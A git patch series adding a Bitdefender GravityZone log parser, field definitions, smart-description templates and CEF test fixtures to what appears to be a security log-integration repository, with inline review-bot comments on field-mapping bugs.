zofNw9>+ct)pe2BrBYCnW?jrb#he6>q=~ldx&C09M=}ysXPKyL%#|BN%zjMMl@3>;q zl7i5T1*q?J;@DMQP8Bl^wO_%DaxWjl0~=qJC78znZ9R1jQ&h_(oKJn=|8?;t62jvH zwYmFS@)Z0^`DdRfsy2#M4osArO)g*3l87l0+uIgMF+=R=$5jUb-o25>!Np84s{8c8 zbi3H> zX?uf2yswuxS?PTo+;yuxZ=3UjTg27^x1bUgkX9T@Fj<>6i!NuKsvONZ*BG4+NpTE0 z;#^pL;m&HNOueC=K$8NtYupkAxd=-m8(!ig+{xc@WF+|)()O119^O9reA3K1cH5{r zHe5_I>3#Up$0jMWAeN~be(e21gwC$+cgN4$@KYd@)A{*C zG}yG^67IEo2dEGM2h^e5P;ER|$&y0oiIj8g^7t0FRcn+f;@~4cZpX5BsKKV^C<9r{ 
zhvz`QjtyX-Tn>UwXbetD(7idx;GNMZYfWn}4k6)p3IqJ9abo49xxmzw+*XL*Nt)BU zpT&Ht#{p$5sXD0M8sl@wU+!sY*sf5h!Kbinq5m6o*Wd!B_`*_GEIbKZ_o2X72%`=R z8*344rb|heAx*wb#IV3~Mc+l%sMiDEjRS_cj~U>(zNu`B-v7DbR}9-Vue!Vwbkn!A z!jl(Mr}I?w?;H_T0Tz42F^jY&DKG0?Qu52dSNiU<=!ECjm@SZ4^ZD6>KeNy~fnXBN z?f`x31bjVoNJFiMfG)T}?yo4_HMhU{b!z%G*AGH==~@qr^WS#={Zm^xDl?YpEdEpy z^sDb*uwQQxN%_8p)f$0A^QR;j1zFiAiuJ8lq$HTtbGlzw-|B#^iXec1t)q5xdfsFW zYqDVlx7s1w1?XOe!R_vhg5?grDrG92Q9XAbehO^o5HW-XFX;%N+#LE}d7!L(+7`Xz z#<5fT6`+m%4z%8SpyxL?3)cu5=NFe&r)xF*Oo3;BT^&M&xq3LtPSU&|TXnr#KMYBQB(@+>W zP+Wl90=KQc7mU;@6=X?Xh5nsr$El*)l0a)7WXsv=u3n_R&DP>z@1GwHq029hpUPr~ zg8a++2Lr;9t#65@e)xClN=N6YM}F;buRu+kgTjOmI`-zb0V2%dBMNK_a)r`StKVPa z1`YxQWF}U8F&h8yfX_+;$n4FD7Ve&n*IMfCUZNiTizaE42P&{=@-B~tL5o4ZOYad$G@I7R2lhC@=U~VZohh2j|w#{u2!zl$pVk z8pF&SKl7m_CpUs8pNY2Ttu&KXUO`YpuXmy2x|Aab;c^tUo~}`tpK~FIM}wYuPLF4T zb(Le#l15_SpTX01D_h`B^4$q)9dE;Z^9Izjx=s@#ugEwTv&$rysOwgLxA}CL+Poow z&5U!a$R`)Bw%{L)tD;Sg0~3hhX$ znnKh_iIw&9KE2SD40&RTYbZ{yE^C$CX?}pv3v51%8yMRLRom;${;Qq_|GupmyW3T7 zh%)cr+$^-{sUvO2QM>;^?CDm&yB61R#{yG~z*dG{!UfZI!N7$oW+3eMIgkYf896N= z$Av@&ZFcDboXDv`$U(qq`2$4LDje*(y&qaVV7I&0k>P?Yc5?6mOZjNM>aFcGzty~~ zI2#5ks-be(msO%AY0s18&5b?qnP=*BLbtXR~FThRt@IC)2Px<+{Jm>-69yK~m_NlU3QBqTB9fAYl^Wy7$2J+T((5;2qEAB;0# zi&Fx`tyuc!2*gRQNkO>t@UK7!GYiAgLgo*5;46z8NvU-;^gsP|ep}2v_A`>C+YQ|9 z!HRDluikaZ<9{e|M7+##=&+f15%NW$KNxIO?!xSVO~O4^0bllH8rE(K3y-nSXZPn# z8Cj@;Z7)Y(ZrtW6p0TsvJ?{ZHvo7qliU)xe-s+zWP>^tEF_&oJHpJJwQb97yWtPo&HB2`)VSg z_WMF<&$)>X_}`7oE-~v?x*@2%uqs|His~AVD$@SzD+$Ue9DN;#zM`^~THmoL-(qGx zaV(?}?2S{R=s3{Q5(D)1V@$xK#UEU-3ySfZK!4CO*7;JR7kJhXm%zy=?R&lHNWJs% z1m4(yLy?4*>?Xk|4-g>(4GTTc4y_^T1hkm)f*@A)P7-=)8`L7H&lxR>A7gg7P?zZ+ zYrGd4S`CpG`-5dSd~B)8g;xlzA=S3zD;%)RcquPjKB_}4c(*H4IhOvk@RqS_25^1t z+amU3nz~$FVY|dNA3331Ecc6Bn;5Mu?Ok4NO4+WTKQz*xdSD@?Ozr<`?>yg{%DOfl zm1nHTsG|so=n%joMGZr5js*!NJdhcXCMpJ`1qlX-p*g6GVyb-uYsetx4YM$`#_AH>X0Awjm$58rU;NV zlm|IL@N?7&wPWdGOdWUvfNY#=;n6-)yOl0qk@>i78)70mDvz?yz9|K$%ciS|Rn zx=A$tm+ua{ed26quL_>ROuy*N@!c*1KQ)2C6&2ygR&>CYBRnxZI}l+YanJQ~#YgHk 
zt6VeYEQQ&UsM31mNIN@`>@i5801ds{t($|+wgV!fD8Y8o3m=5!(TWm0zLTAFU6UDkq_+Q)-ahbR+9peg1!(5UI#$i;uzi zjA}X|v#R6r1#>bPNxIAyls)D#JTJcN*j$TKyn3@1BuIWSH7(&lSr%61)R3NtR(R~m zX~Hu0#J4SB>*G?|Z3!btdS3T128~Z6{3@YC>Dc_n>Es9$C(9ei$>2h)yx&3y>nt07 z!E;Rc+3;uF4t_V?7T*!*7dKFFILMN!aj^{ZZewz?%l#**~ zfirsrRK+?H!YIASMwBq1rY19}34pIZZ8d*#z2B!Ms_xcYp5Y$1muIOBSW8n=O|<|cpSw*j3dFy&iB_7HKn`B#vbOm50ipv{s0M&x%ApEZ z_T#4=7zKXhOsKemdJ9vMEh1VX3NamEM(;IW)ZdIB&ilNrHfNV@`8CT(6;`{|{5^Qd z)&E3p$yusDBmejBPmy#C>DVsN*gY{V-9zd}cFj)uT706|>F02*q?oa&uc@q~ z^|LwoszMbA3p-uyKpJ3N`o^4~qa(K;NXXJhsK>qsvL3S3yZ+V{lUwN%Ii^Nck%EMP zCUaiWx<+Du;RP`%AB=SP#pKByYs-aDdN2U^if{J74$1~r3I*<7ypkGBd9Al8 z1}zHwez~zqhmVJ{2WBhgqUn#vbk*NwzDI24o4;ymKv%x= ztYega!h6O@n!qRZwqp7U9qvq^q#}~|;biuiCzO`0UFP5wN#UgLlhDz6shS95{eG?( zW`>|ex8HPm6VFlonYMl9mZcWT!hEN&BbRNM~2uVX>Y1$()>`#x8j$=`sfi=+)v{@U7<~L%p3~g&Z+q$pwH{e zj_n6v?R%6v`R}N(;^M?Mv&d~p5W-F~MnD_K(Xq-oUgS_81dwbE9j9f3EORZT`-PQ7K0X|=6 zkrgU`xtJwAQ*vqk%5(i3tx}#}plj)D5te}(W)d$rT`7a(emgrYV+?yGO8_NYtDgZD zuOLo$=3zah?;gyzGpC_G1^#E*^_gJ(nX9xKiWJzpY)PHuDUmN5Ti$~&tv#t@H9ymv z`Rq#w#G%B^<-jkLoThZ4Z1i)%61w`sn|%SCH?RXMWzTZ~6&c<2X5R}L74*DZfk|CX zCT)D}Dzxqu*^V?K$;ovRlbsb3Di^`xu@(c%=eaM1eTv{-twvbN^gR_ z%hyu^DO-k}2z3KdS_ zOw~%U;YjjP#5FgJ4WaM#jf_9+z0EBPtB|SuJ%TjVm2x@s~E(^tUhpu?+#Q8yMg#sN}x24CpyPg$DFAhbx#>@2E#YM z4dK!%PvsuxUx=Ly4-rRQ73Xw&#Ld%_D=V*(&BU`v>8rVs8qN!qf&i=ex8W+X?;2G& z%WcRo48c#3aC2%bt>$6h;@E4LH+k1UGt7Y+hvS@$A%Oz#ZTMkK=xLS4mgI;sqQ=F; zn~u2MI?Mi7`Ew&qh>O@G?5hXby#EQ0324e#z{~KEiS3Nc27AEpaJWhHi>pCi@=Gpc zEc?0#L+~0IW;H+7t326?`^R_%^jPfXpKROYJQa+tE*+4XC4y93pH}Y7e(&f#G2We? 
z_HNg9#K4z&WTM@CDpI~|dPm+|DH8Z$+*dF$m<~P3O&S;KTBPTUiv0#1Wi#U3q~C ziZE+Ce@82-K%7}1Ss)QysTH}>_F0R(#b=qRB0 z*|+!{8RW~`e(?PTDp#l39%y%RKvAWkcuDX%WQ?oUJP7Mm&#IVo7QMA#n*NDbJM)R8+aAve9_OvHl-NI{0( z*YiyoD}b_(O%6Fbrl^yM5k6Wypv|VxE^oF1kZ`1k-m9#T=FFr#xm1xE-4WYwH%uEh zphi3+UQi#0VZDMhz|BQmq>b~S2lT_4zHw)?crNIfWZ%MMBB9YNUgU;-H}!DVyzB-9Q``?p#gbZNhVur-c@?NyArB*7Qj zh&&{*T7j0gb1z2moGp%}Iuzr->0gV=p&=0j~_GFK1R_5czk zQ>0rzbK&O)+}X&aa*s8S zdSBBHZZ=ny%3%1}F$6?~Wv>*_N z0@!D122JY5=z;J_un;%NdZeOcm(`(c_*SR`)rX-KKUch8GFziklRFgR4mJ$n7x1ky zQsIH~+a;5s8@ce!i?VJ$YNA;<{i(ke|L)}bb$K7zB_N!MjHb;anM>sGm*NMbyQ>~6 zQzbPp1Qm2lXbE80Av%wkZM|Bxv`cLKgNX*omKwxZB|rJSDx^f?<&3ywG2J9}S|_$$>wt$Y9=#W6Df6hAyX zsH`EL31IxGBi1f0iFOI-)xO*^PzN|VubLcjVtPa^%)H7i+{aP5O^0x6{KkvBO3B|=PKn3(a$;Y{Jo!^ykXzmogpE{59i7=e>o#h5 z3vhsCp4L_?b#Tcsx0+}tM|pKpwDp%VX@I@`esGL*)vX=jLb!M)DYUmfy3l4oJ7g>x zrL^^0|Bb7sj|w%#vUtXRpoR> zJ|s>-dggx^enkChc0-Ao^YxIi{chXsoikZ1@3zsvisIjWm;qLc-|iY0`UZLXH+73< zxLv*whj@{j08Xd#k>n<1nH9^8b66XHmL2;ko*r+{NE9?>a=i6hI=Y(LUsUAm+WV}4 zwosPpuR%J^4yzC3tc`MnSWBqdyg6|z-k%N&?yNHcnp?_F>4Vnc$*U{vPlYgi?{gF*Q#*FF63 zBSLjhCZY4jIrf%EM>A-sy&^0mkMLA_raWkD$TuT$U}2vFqe?CFWm0^#xGDcF1aw%dj%yz`>+(8T6xz69Q zS>v91eCSh3yZykc&opQ!AHQpjf^o?L1uCl|09y$@z;oU;@SdA1S`soD$Jy7&I{->K z3z1P&`ibuCkbLThZTZ2A7T@=rv?S+L()D})-bpNhg+1+1wr-dW>2a0z1mn(r;81ef z#0dAxWCwQGYa~92KG}bYA2$8LeNC6}Z?@0XB6#iwd9?No-0{u`s=3Sb=JmsEy(Of`j$04v@ry^Mqc1V%O}kOQ0>j4H3}RSnI_*AeCfndzcoa z6!c*kv%SF}!OtU|z>!-FoP~+v&{qDIx)4W87mwd6us3nD!1lxpJ8Yw*qUez_pQMr! z*mh6WdlVP}Ax;;4HC%Tl+V}#DOw9T)Z1@##_!Wa`@V|b=8y`a2_&(Iebl8ZB|1YCr zt+X#e`ThE~xNE+wy2<%qT`FST_b}$vrhlS>*XAGB|JW#VWc@9YU; literal 0 HcmV?d00001 diff --git a/Bitdefender/gravityzone/_meta/manifest.yml b/Bitdefender/gravityzone/_meta/manifest.yml new file mode 100644 index 000000000..d7f027920 --- /dev/null +++ b/Bitdefender/gravityzone/_meta/manifest.yml 
@@ -0,0 +1,11 @@
+uuid: d11df984-840d-4c29-a6dc-b9195c3a24e3
+name: Bitdefender GravityZone
+slug: gravityzone
+
+description: >-
+ Bitdefender GravityZone is an enterprise-level cybersecurity solution offering advanced threat prevention, detection, and response for endpoints, networks, and cloud environments. It features centralized management for streamlined security oversight.
+
+data_sources:
+ Authentication logs:
+ Network device logs:
+ File monitoring:
diff --git a/Bitdefender/gravityzone/_meta/smart-descriptions.json b/Bitdefender/gravityzone/_meta/smart-descriptions.json
new file mode 100644
index 000000000..6579befcb
--- /dev/null
+++ b/Bitdefender/gravityzone/_meta/smart-descriptions.json
@@ -0,0 +1,125 @@
+[
+ {
+ "value": "New file threat {threat.indicator.name} with severity {event.severity} from {source.user.name} on {threat.indicator.file.path}",
+ "conditions": [
+ {
+ "field": "threat.indicator.name"
+ },
+ {
+ "field": "event.severity"
+ },
+ {
+ "field": "source.user.name"
+ },
+ {
+ "field": "threat.indicator.file.path"
+ },
+ {
+ "field": "threat.indicator.type",
+ "value": "file"
+ }
+ ]
+ },
+ {
+ "value": "New threat {threat.indicator.name} with severity {event.severity} from {source.user.name}",
+ "conditions": [
+ {
+ "field": "threat.indicator.name"
+ },
+ {
+ "field": "event.severity"
+ },
+ {
+ "field": "source.user.name"
+ }
+ ]
+ },
+ {
+ "value": "New threat {threat.indicator.name} with severity {event.severity}",
+ "conditions": [
+ {
+ "field": "threat.indicator.name"
+ },
+ {
+ "field": "event.severity"
+ }
+ ]
+ },
+ {
+ "value": "Alert on {host.name} from {source.user.name}",
+ "conditions": [
+ {
+ "field": "event.kind",
+ "value": "alert"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "source.user.name"
+ }
+ ]
+ },
+ {
+ "value": "Alert on {host.name}",
+ "conditions": [
+ {
+ "field": "event.kind",
+ "value": "alert"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "Action {event.action} on {host.name} from {source.user.name}",
+ "conditions": [
+ {
+ "field": "event.action"
+ },
+ {
+ "field": "host.ip"
+ },
+ {
+ "field": "source.user.name"
+ }
+ ]
+ },
+ {
+ "value": "Action {event.action} on {host.name}",
+ "conditions": [
+ {
+ "field": "event.action"
+ },
+ {
+ "field": "host.ip"
+ }
+ ]
+ },
+ {
+ "value": "{event.category} event on {host.name} from {source.user.name}",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "source.user.name"
+ }
+ ]
+ },
+ {
+ "value": "{event.category} event on {host.name}",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "host.ip"
+ }
+ ]
+ }
+]
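Review bot: Three templates render `{host.name}` while their conditions require `host.ip` instead — `Action {event.action} on {host.name} from {source.user.name}`, `Action {event.action} on {host.name}` and the last entry `{event.category} event on {host.name}` — so such a description can be selected for an event that carries only host.ip, leaving the `{host.name}` placeholder unresolved in the summary an analyst sees. The sibling entries (`Alert on {host.name}`, `{event.category} event on {host.name} from {source.user.name}`) condition on `host.name`, which looks like the intended field; either change those three conditions to `"field": "host.name"` or render `{host.ip}` in their templates. Note that the parser added in this commit sets `event.kind` to `alert` only for the `new-incident` module, so the two `Alert on …` entries never fire for other modules — presumably intended, but worth a line in the commit description.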
diff --git a/Bitdefender/gravityzone/ingest/parser.yml b/Bitdefender/gravityzone/ingest/parser.yml
new file mode 100644
index 000000000..b6af1ad11
--- /dev/null
+++ b/Bitdefender/gravityzone/ingest/parser.yml
@@ -0,0 +1,111 @@ +name: bitdefender-gravityzone +pipeline: + - name: parse_event + external: + name: cef.parse-cef + + - name: parsed_date + external: + name: date.parse + properties: + input_field: "{{parse_event.message.eventdate or parse_event.message.BitdefenderGZDetectionTime}}" + output_field: datetime + + - name: set_event_fields + - name: set_ecs_fields + +stages: + set_event_fields: + actions: + - set: + event.action: "{{parse_event.message.act}}" + event.module: "{{parse_event.message.BitdefenderGZModule}}" + event.severity: "{{parse_event.message.Severity}}" + event.type: ["info"] + + - set: + event.kind: "alert" + filter: "{{ parse_event.message.BitdefenderGZModule == 'new-incident' }}" + + - set: + event.type: ["denied"] + filter: "{{ parse_event.message.BitdefenderGZModule == 'aph' }}" + + - set: + event.type: ["start"] + filter: "{{ parse_event.message.Name == 'Login from new device' }}" + + - translate: + dictionary: + Exchange Malware Detected: ["malware"] + Invalid Exchange user credentials: ["intrusion_detection"] + Sandbox Analyzer Detection: ["malware"] + Storage Antimalware Event: ["malware"] + Login from new device: ["authentication"] + Authentication audit: ["authentication"] + SMTP Connection: ["network"] + Internet Connection: ["network"] + Malware Outbreak: ["malware"] + mapping: + parse_event.message.Name: event.category + filter: "{{parse_event.message.Name != None}}" + + - translate: + dictionary: + "aph": ["network"] + "application-control": ["process"] + "application-inventory": ["package"] + "av": ["malware"] + "avc": ["malware"] + "dp": ["intrusion_detection"] + "exchange-user-credentials": ["intrusion_detection"] + "fw": ["network"] + "hd": ["malware"] + "antiexploit": ["intrusion_detection"] + "network-monitor": ["intrusion_detection"] + "registration": ["host"] + "device-control": ["host"] + "ransomware-mitigation": ["intrusion_detection"] + "new-incident": ["process"] + mapping: + parse_event.message.BitdefenderGZModule: 
event.category + filter: "{{parse_event.message.BitdefenderGZModule != None}}" + + set_ecs_fields: + actions: + - set: + "@timestamp": "{{parsed_date.datetime}}" + host.ip: "{{parse_event.message.dvc}}" + host.name: "{{parse_event.message.BitdefenderGZComputerFQDN or parse_event.message.dvchost}}" + destination.user.name: "{{parse_event.message.duser}}" + source.user.name: "{{parse_event.message.suser}}" + source.user.id: "{{parse_event.message.suid}}" + url.original: "{{parse_event.message.request}}" + rule.name: "{{parse_event.message.BitdefenderGZBlockingRuleName}}" + organization.id: "{{parse_event.message.BitdefenderGZCompanyId}}" + host.id: "{{parse_event.message.BitdefenderGZEndpointId}}" + email.subject: "{{parse_event.message.BitdefenderGZEmailSubject}}" + email.sender.address: "{{parse_event.message.BitdefenderGZEmailSender}}" + source.ip: "{{parse_event.message.BitdefenderGZEventSourceIP}}" + process.parent.name: "{{parse_event.message.BitdefenderGZParentProcess}}" + process.parent.path: "{{parse_event.message.BitdefenderGZParentProcessPath}}" + threat.indicator.name: "{{parse_event.message.BitdefenderGZThreatName}}" + threat.indicator.file.hash.sha256: "{{parse_event.message.BitdefenderGZMalwareHash}}" + observer.vendor: "{{parse_event.message.DeviceVendor}}" + observer.product: "{{parse_event.message.DeviceProduct}}" + observer.version: "{{parse_event.message.DeviceVersion}}" + bitdefender.gravityzone.exploit.type: "{{parse_event.message.BitdefenderGZExploitType}}" + + - set: + file.path: "{{parse_event.message.filePath}}" + filter: "{{parse_event.message.get('BitdefenderGZMalwareType') == None or parse_event.message.BitdefenderGZMalwareType.lower() != 'file'}}" + + - set: + threat.indicator.name: "{{parse_event.message.BitdefenderGZMalwareName}}" + threat.indicator.type: "file" + filter: "{{parse_event.message.get('BitdefenderGZMalwareName') != None}}" + + - set: + threat.indicator.file.path: "{{parse_event.message.filePath}}" + 
threat.indicator.file.name: "{{parse_event.message.filePath | basename}}" + filter: "{{parse_event.message.get('BitdefenderGZMalwareType', '').lower() == 'file'}}" diff --git a/Bitdefender/gravityzone/tests/antimalware_1.json b/Bitdefender/gravityzone/tests/antimalware_1.json new file mode 100644 index 000000000..be17a226e --- /dev/null +++ b/Bitdefender/gravityzone/tests/antimalware_1.json 
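Review bot: `host.name: "{{parse_event.message.BitdefenderGZComputerFQDN or parse_event.message.dvchost}}"` in set_ecs_fields copies dvchost verbatim, and the login_1.json fixture added by this commit shows an IP address (`dvchost=1.2.3.4`) landing in host.name while host.ip stays empty, so host pivots and related.ip miss it; since dvchost evidently can hold an address, consider a second `set` that routes the value to host.ip when it parses as an IP, and to host.name otherwise. Likewise, parsed_date reads only `eventdate` or `BitdefenderGZDetectionTime`, so events that carry their time in CEF `start=` (again the login fixture, whose expected output has no @timestamp) get no event-derived timestamp and presumably fall back to ingestion time; adding `parse_event.message.start` to the `or` chain in `input_field` would cover them. Finally, both `translate` actions write event.category, so when `Name` and `BitdefenderGZModule` are both in their dictionaries the module mapping silently overwrites the Name mapping — a comment such as `# module mapping runs last and takes precedence over the Name mapping` would make that order explicit.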
@@ -0,0 +1,56 @@ +{ + "input": { + "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:52.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500" + }, + "expected": { + "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:52.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500", + "event": { + "action": "blocked", + "category": [ + "malware" + ], + "module": "av", + "severity": 9, + "type": [ + "info" + ] + }, + "@timestamp": "2024-05-15T09:06:52Z", + "host": { + "ip": "10.0.0.4", + "name": "desktop-jdo.example.org" + 
}, + "observer": { + "product": "GravityZone", + "vendor": "Bitdefender", + "version": "6.50.0-27" + }, + "organization": { + "id": "8646b1be9aae4aefb3b23147" + }, + "related": { + "ip": [ + "10.0.0.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "user": { + "id": "S-1-5-21-1111111111-222222222-3333333333-500", + "name": "jdoe" + } + }, + "threat": { + "indicator": { + "file": { + "name": "b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp", + "path": "C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp" + }, + "name": "EICAR-Test-File (not a virus)", + "type": "file" + } + } + } +} \ No newline at end of file diff --git a/Bitdefender/gravityzone/tests/antimalware_2.json b/Bitdefender/gravityzone/tests/antimalware_2.json new file mode 100644 index 000000000..3f29dcbd2 --- /dev/null +++ b/Bitdefender/gravityzone/tests/antimalware_2.json 
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) BitdefenderGZMalwareHash=275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:53.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500" + }, + "expected": { + "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) BitdefenderGZMalwareHash=275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:53.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500", + "event": { + "action": "blocked", + "category": [ + "malware" 
+ ], + "module": "av", + "severity": 9, + "type": [ + "info" + ] + }, + "@timestamp": "2024-05-15T09:06:53Z", + "host": { + "ip": "10.0.0.4", + "name": "desktop-jdo.example.org" + }, + "observer": { + "product": "GravityZone", + "vendor": "Bitdefender", + "version": "6.50.0-27" + }, + "organization": { + "id": "8646b1be9aae4aefb3b23147" + }, + "related": { + "ip": [ + "10.0.0.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "user": { + "id": "S-1-5-21-1111111111-222222222-3333333333-500", + "name": "jdoe" + } + }, + "threat": { + "indicator": { + "file": { + "hash": { + "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f" + }, + "name": "b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp", + "path": "C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp" + }, + "name": "EICAR-Test-File (not a virus)", + "type": "file" + } + } + } +} \ No newline at end of file diff --git a/Bitdefender/gravityzone/tests/login_1.json b/Bitdefender/gravityzone/tests/login_1.json new file mode 100644 index 000000000..ddf96c93f --- /dev/null +++ b/Bitdefender/gravityzone/tests/login_1.json 
@@ -0,0 +1,35 @@ +{ + "input": { + "message": "CEF:0|Bitdefender|GZ|6.50.0-27|6|Login from new device|3|start=Jun 11 2024 12:34:56+01:00 BitdefenderGZCompanyName=example suser=jdoe BitdefenderGZLoginOS=Win11 BitdefenderGZAuthenticationBrowserName=Chrome BitdefenderGZAuthenticationBrowserVersion=129.0.6668.70 dvchost=1.2.3.4" + }, + "expected": { + "message": "CEF:0|Bitdefender|GZ|6.50.0-27|6|Login from new device|3|start=Jun 11 2024 12:34:56+01:00 BitdefenderGZCompanyName=example suser=jdoe BitdefenderGZLoginOS=Win11 BitdefenderGZAuthenticationBrowserName=Chrome BitdefenderGZAuthenticationBrowserVersion=129.0.6668.70 dvchost=1.2.3.4", + "event": { + "category": [ + "authentication" + ], + "severity": 3, + "type": [ + "start" + ] + }, + "host": { + "name": "1.2.3.4" + }, + "observer": { + "product": "GZ", + "vendor": "Bitdefender", + "version": "6.50.0-27" + }, + "related": { + "user": [ + "jdoe" + ] + }, + "source": { + "user": { + "name": "jdoe" + } + } + } +} \ No newline at end of file From dc2ecb405350919b0d9e494cccc2caa13eac0b1c Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 22 Oct 2024 13:16:13 +0300 Subject: [PATCH 165/317] Apply linter --- Bitdefender/gravityzone/_meta/fields.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Bitdefender/gravityzone/_meta/fields.yml b/Bitdefender/gravityzone/_meta/fields.yml index 57f24a53a..52fd0cc6a 100644 --- a/Bitdefender/gravityzone/_meta/fields.yml +++ b/Bitdefender/gravityzone/_meta/fields.yml @@ -1,9 +1,9 @@ bitdefender.gravityzone.exploit.type: - description: 'Exploit type detected by Bitdefender GravityZone.' + description: Exploit type detected by Bitdefender GravityZone. name: bitdefender.gravityzone.exploit.type type: keyword process.parent.path: - description: 'Path of the parent process.' + description: Path of the parent process. name: process.parent.path type: keyword From 997a03cb9d084e0d78358ae0cb1b5e3870e90446 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 23 Oct 2024 11:04:55 +0200 Subject: [PATCH 166/317] fix(Bitdefender): add beta flag --- Bitdefender/gravityzone/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Bitdefender/gravityzone/_meta/manifest.yml b/Bitdefender/gravityzone/_meta/manifest.yml index d7f027920..51df52c6b 100644 --- a/Bitdefender/gravityzone/_meta/manifest.yml +++ b/Bitdefender/gravityzone/_meta/manifest.yml @@ -1,5 +1,5 @@ uuid: d11df984-840d-4c29-a6dc-b9195c3a24e3 -name: Bitdefender GravityZone +name: Bitdefender GravityZone [BETA] slug: gravityzone description: >- From 42bd3e8e3e124d1a689e589b7a03d72f5da1d768 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 25 Oct 2024 12:06:55 +0200 Subject: [PATCH 167/317] Add some improvements to the parser --- .../_meta/smart-descriptions.json | 37 +++++++++----- Google Cloud/google-report/ingest/parser.yml | 20 ++++++++ .../tests/test_vault_service.json | 48 +++++++++++++++++++ 3 files changed, 94 insertions(+), 11 deletions(-) create mode 100644 Google Cloud/google-report/tests/test_vault_service.json diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 17ce57463..6a934ee3d 100644 --- a/Google 